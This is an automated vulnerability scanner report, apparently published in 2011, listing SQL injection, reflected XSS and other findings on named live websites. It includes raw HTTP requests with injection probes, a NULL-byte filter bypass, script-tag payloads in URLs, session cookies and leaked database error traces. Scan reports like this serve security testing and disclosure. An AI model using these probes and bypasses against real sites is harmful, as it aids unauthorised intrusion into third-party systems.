XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 11092011-01 Report generated by XSS.CX at Wed Nov 09 16:36:58 CST 2011.
Loading
1. SQL injection
1.1. http://cm.g.doubleclick.net/pixel [id cookie]
1.2. http://www.mongodb.org/dosearchsite.action [queryString parameter]
1.3. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]
1.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]
1.5. http://www.mongodb.org/s/1627/3/140/_/styles/colors.css [spaceKey parameter]
1.6. http://www.mongodb.org/s/1627/3/140/_/styles/combined.css [spaceKey parameter]
1.7. http://www.mongodb.org/s/1627/3/140/_/styles/custom.css [spaceKey parameter]
1.8. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]
1.9. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]
2. Cross-site scripting (reflected)
2.1. https://account.covestor.com/mirroring-account/join-trial [email parameter]
2.2. https://account.covestor.com/mirroring-account/join-trial [emailconfirm parameter]
2.3. https://account.covestor.com/mirroring-account/join-trial [fname parameter]
2.4. https://account.covestor.com/mirroring-account/join-trial [lname parameter]
2.5. https://account.covestor.com/mirroring-account/join-trial [phone parameter]
2.6. http://harvardbusinessreview-www.baynote.net/baynote/tags3/guide/results2/harvardbusinessreview-www [elementIds parameter]
2.7. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG [Nao parameter]
2.8. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr [REST URL parameter 7]
2.9. http://ox-d.hbr.org/w/1.0/ajs [o parameter]
2.10. http://ox-d.hbr.org/w/1.0/ajs [o parameter]
2.11. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css [REST URL parameter 1]
2.12. http://www.mongodb.org/json/contentnamesearch.action [query parameter]
2.13. http://www.mongodb.org/s/1627/3/140/_/styles/combined.css [spaceKey parameter]
2.14. http://www.sequoiacap.com/us/search/autocomplete [q parameter]
2.15. http://www.svangel.com/ [name of an arbitrarily supplied request parameter]
2.16. http://www.svangel.com/favicon.ico [REST URL parameter 1]
3. Flash cross-domain policy
3.1. http://www.gravatar.com/crossdomain.xml
3.2. http://www.magnify.net/crossdomain.xml
4. Cleartext submission of password
4.1. http://www.codecademy.com/register
4.2. http://www.codecademy.com/register/sign_up
5. Session token in URL
5.1. http://www.mongodb.org/display/DOCS/Home
5.2. http://www.mongodb.org/display/DOCS/Source+Code
6. Cookie without HttpOnly flag set
6.1. http://www.mongodb.org/try/js/connection.js
6.2. http://www.mongodb.org/try/js/constants.js
6.3. http://www.mongodb.org/try/js/lib/collection.js
6.4. http://www.mongodb.org/try/js/lib/query.js
6.5. http://www.mongodb.org/try/js/mongo.js
6.6. http://www.mongodb.org/try/js/object_id.js
6.7. http://www.mongodb.org/try/js/shell_utils.js
6.8. http://www.mongodb.org/try/js/tokens.js
6.9. http://www.mongodb.org/try/js/utils.js
6.10. https://account.covestor.com/mirroring-account/join-trial
6.11. https://account.covestor.com/mirroring-account/join-trial
6.12. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
6.13. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
6.14. http://hbr.org/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
6.15. http://hbr.org/hbrg-main/resources/css/marketing/baynote.css
6.16. http://hbr.org/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
6.17. http://hbr.org/hbrg-main/resources/css/reset.css
6.18. http://hbr.org/hbrg-main/resources/css/stay_connected.css
6.19. http://hbr.org/hbrg-main/resources/css/style.css
6.20. http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html
6.21. http://hbr.org/hbrg-main/resources/images/favicon.ico
6.22. http://hbr.org/hbrg-main/resources/images/generic_product_images/case_study_100.gif
6.23. http://hbr.org/hbrg-main/resources/images/hbrPrintLogo.gif
6.24. http://hbr.org/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
6.25. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
6.26. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
6.27. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
6.28. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
6.29. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_buzz.png
6.30. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_facebook.png
6.31. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_iphone.png
6.32. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
6.33. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
6.34. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_rss.png
6.35. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_twitter.png
6.36. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_youtube.png
6.37. http://hbr.org/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
6.38. http://hbr.org/hbrg-main/resources/images/mastheadNavBg_w11.gif
6.39. http://hbr.org/hbrg-main/resources/images/mastheadSearchForm_submit.gif
6.40. http://hbr.org/hbrg-main/resources/images/store_header.gif
6.41. http://hbr.org/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
6.42. http://hbr.org/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
6.43. http://hbr.org/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
6.44. http://hbr.org/hbrg-main/resources/scripts/marketing/baynote.js
6.45. http://hbr.org/hbrg-main/resources/scripts/marketing/marketing.min.js
6.46. http://hbr.org/hbrg-main/resources/scripts/most-jsonp.js
6.47. http://hbr.org/hbrg-main/resources/scripts/paywall.js
6.48. http://hbr.org/hbrg-main/resources/scripts/plugins.min.js
6.49. http://hbr.org/hbrg-main/resources/scripts/scripts.min.js
6.50. http://hbr.org/hbrg-main/resources/scripts/search-supplemental.js
6.51. http://hbr.org/hbrg-main/resources/scripts/subscriber-search.js
6.52. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
6.53. http://hbr.org/products/12795-PDF-ENG/thumbnail/thumbnail.gif
6.54. http://hbr.org/products/13292-PDF-ENG/thumbnail/thumbnail.gif
6.55. http://hbr.org/products/1915-PBK-ENG/thumbnail/thumbnail.gif
6.56. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
6.57. http://hbr.org/service/restv1/usersession/clickStream
6.58. http://hbr.org/service/restv1/usersession/displayChallenge
6.59. http://ox-d.hbr.org/w/1.0/ajs
6.60. http://www.mongodb.org/
7. Password field with autocomplete enabled
7.1. https://account.covestor.com/mirroring-account/join-trial
7.2. http://www.codecademy.com/register
7.3. http://www.codecademy.com/register/sign_up
8. Source code disclosure
8.1. http://www.codecademy.com/assets/application.js
8.2. http://www.sequoiacap.com/javascripts/sc.js
9. Referer-dependent response
10. SSL cookie without secure flag set
10.1. https://account.covestor.com/mirroring-account/join-trial
10.2. https://account.covestor.com/mirroring-account/join-trial
11. Cookie scoped to parent domain
11.1. https://account.covestor.com/mirroring-account/join-trial
11.2. https://account.covestor.com/mirroring-account/join-trial
12. Cross-domain Referer leakage
12.1. http://cm.g.doubleclick.net/pixel
12.2. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
12.3. http://www.mongodb.org/dosearchsite.action
12.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
12.5. http://www.sequoiacap.com/javascripts/sc.js
13. Cross-domain script include
13.1. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
13.2. http://www.codecademy.com/
13.3. http://www.codecademy.com/about_us
13.4. http://www.codecademy.com/courses/jquery-and-the-dom
13.5. http://www.codecademy.com/courses/jquery-and-the-dom/0
13.6. http://www.codecademy.com/courses/jquery-and-the-dom/1
13.7. http://www.codecademy.com/register
13.8. http://www.codecademy.com/register/sign_up
13.9. http://www.codecademy.com/secret
13.10. http://www.codecademy.com/secret/new
13.11. http://www.codecademy.com/subjects/javascript
13.12. http://www.mongodb.org/
13.13. http://www.mongodb.org/display/DOCS/Home
13.14. http://www.mongodb.org/display/DOCS/Source+Code
13.15. http://www.sequoiacap.com/
13.16. http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
13.17. http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(1)%3C/script%3Ecf97f530072
13.18. http://www.sequoiacap.com/ideas
13.19. http://www.sequoiacap.com/us
13.20. http://www.sequoiacap.com/us/early
13.21. http://www.sequoiacap.com/us/earth-networks
13.22. http://www.sequoiacap.com/us/zzzzzz=yyyyy
13.23. http://www.sequoiacap.com/us/zzzzzz=yyyyy/early
14. TRACE method is enabled
14.1. http://www.magnify.net/
14.2. http://www.mongodb.org/
15. Email addresses disclosed
15.1. http://www.codecademy.com/assets/application.js
15.2. http://www.mongodb.org/display/DOCS/Home
15.3. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:jquery-base/com.atlassian.auiplugin:jquery-base.js
15.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:prototype/confluence.web.resources:prototype.js
15.5. http://www.sequoiacap.com/javascripts/sc.js
16. Robots.txt file
16.1. https://account.covestor.com/mirroring-account/join-trial
16.2. http://cm.g.doubleclick.net/pixel
16.3. http://www.gravatar.com/avatar.php
16.4. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css
17. Cacheable HTTPS response
18. HTML does not specify charset
19. Content type incorrectly stated
19.1. http://harvardbusinessreview-www.baynote.net/baynote/tags3/common
19.2. http://hbr.org/hbrg-main/resources/images/favicon.ico
19.3. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
19.4. http://www.mongodb.org/json/contentnamesearch.action
19.5. http://www.mongodb.org/plugins/pagetree/naturalchildren.action
19.6. http://www.mongodb.org/try/js/lib/query.js
20. SSL certificate
1. SQL injection
next
There are 9 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application. You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed. Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://cm.g.doubleclick.net/pixel [id cookie]
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /pixel?google_nid=B765081F39B1F7&google_cm&google_sc HTTP/1.1 Host: cm.g.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://canv.as/x/abstract/top/2011 Cookie: id=22bc9c0c4801009e||t=1320629868|et=730|cs=002213fd48cb0cf34a9821d52f'
Response 1 (redirected)
HTTP/1.1 302 Found Location: http://cms.quantserve.com/dpixel?eid=0&id=&google_error =0 Cache-Control: no-store, no-cache Pragma: no-cache Date: Wed, 09 Nov 2011 13:21:54 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 262 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://cms.quantserve.com/dpixel...[SNIP]...
Request 2
GET /pixel?google_nid=B765081F39B1F7&google_cm&google_sc HTTP/1.1 Host: cm.g.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://canv.as/x/abstract/top/2011 Cookie: id=22bc9c0c4801009e||t=1320629868|et=730|cs=002213fd48cb0cf34a9821d52f''
Response 2
HTTP/1.1 302 Found Location: http://cms.quantserve.com/dpixel?eid=0&id=&google_gid=CAESEBoO8rDuQMKCstxVfgo3pL4&google_cver=1 Cache-Control: no-store, no-cache Pragma: no-cache Date: Wed, 09 Nov 2011 13:21:55 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 304 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://cms.quantserve.com/dpixel...[SNIP]...
1.2. http://www.mongodb.org/dosearchsite.action [queryString parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/dosearchsite.action
Issue detail
The queryString parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the queryString parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /dosearchsite.action?queryString=sql+stored+proc+trigger+function%00' &where=DOCS HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Source+Code Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.4.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:04:42 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00 at /search/searchpanel.vm[line 46, column 14]<br>...[SNIP]...
1.3. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
Issue detail
The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /s/1627/3/1.0/_/download/batch' /confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:03:52 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <br> Database Dialect: net.sf.hibernate.dialect.PostgreSQL Dialect<br>...[SNIP]...
1.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
Issue detail
The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles' /confluence.web.resources:print-styles.css?media=print HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:03:54 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <br> Database Dialect: net.sf.hibernate.dialect.PostgreSQL Dialect<br>...[SNIP]...
1.5. http://www.mongodb.org/s/1627/3/140/_/styles/colors.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/140/_/styles/colors.css
Issue detail
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /s/1627/3/140/_/styles/colors.css?spaceKey=DOCS%00' HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/s/1627/3/140/_/styles/combined.css?spaceKey=DOCS Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:29 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00<br>...[SNIP]...
1.6. http://www.mongodb.org/s/1627/3/140/_/styles/combined.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/140/_/styles/combined.css
Issue detail
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /s/1627/3/140/_/styles/combined.css?spaceKey=DOCS%00' HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/display/DOCS/Home Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=utf-8 Date: Wed, 09 Nov 2011 13:03:29 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans...[SNIP]... org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is org.postgresql .util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00 org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:110)...[SNIP]...
1.7. http://www.mongodb.org/s/1627/3/140/_/styles/custom.css [spaceKey parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.mongodb.org
Path:
/s/1627/3/140/_/styles/custom.css
Issue detail
The spaceKey parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the spaceKey parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be PostgreSQL. The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /s/1627/3/140/_/styles/custom.css?spaceKey=DOCS%00' HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.org/s/1627/3/140/_/styles/combined.css?spaceKey=DOCS Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.1.10.1320843794; __utmc=266042259; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02
Response
